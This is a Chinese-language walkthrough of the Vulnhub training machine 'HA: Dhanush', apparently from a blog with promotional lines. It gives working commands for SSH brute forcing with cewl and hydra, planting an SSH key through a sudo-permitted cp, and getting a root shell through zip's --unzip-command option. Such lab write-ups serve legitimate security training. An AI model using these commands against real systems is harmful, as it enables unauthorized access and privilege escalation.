靶机下载链接:

https://www.vulnhub.com/entry/ha-dhanush,396/

SRE实战 互联网时代守护先锋,助力企业售后服务体系运筹帷幄!一键直达领取阿里云限量特价优惠。

主机扫描:

HA: Dhanush Vulnhub Walkthrough Safe 第1张

 

主机端口扫描:

HA: Dhanush Vulnhub Walkthrough Safe 第2张

 

HTTP目录爬取

使用dirb dirsearch 爬取均未发现可利用的目录

另外看到ssh端口开启了,进行网页爬取字典生成进行爆破

cewl http://10.10.202.147 -w dict.txt

HA: Dhanush Vulnhub Walkthrough Safe 第3张

 

╰─ hydra -L dict.txt 10.10.202.147 ssh -s 65345 -e nsr

HA: Dhanush Vulnhub Walkthrough Safe 第4张

 

HA: Dhanush Vulnhub Walkthrough Safe 第5张

 

尝试复制passwd文件提示无权限,用户sarangy用户才具有cp的root权限执行

这里的思路:

pinak用户生成秘钥对,然后使用过cp命令复制到用户sarang用户的.ssh目录为authorized_keys文件

然后ssh -i rsa_id 进行登录,尝试提权

HA: Dhanush Vulnhub Walkthrough Safe 第6张

 

sudo -u sarang /bin/cp ./id_rsa.pub /home/sarang/.ssh/authorized_keys

HA: Dhanush Vulnhub Walkthrough Safe 第7张

 

HA: Dhanush Vulnhub Walkthrough Safe 第8张

 

zip命令提权

sudo zip /tmp/test.zip /home/sarang/test -T --unzip-command="sh -c /bin/bash"

HA: Dhanush Vulnhub Walkthrough Safe 第9张

 

 OVER!

扫码关注我们
微信号:SRE实战
拒绝背锅 运筹帷幄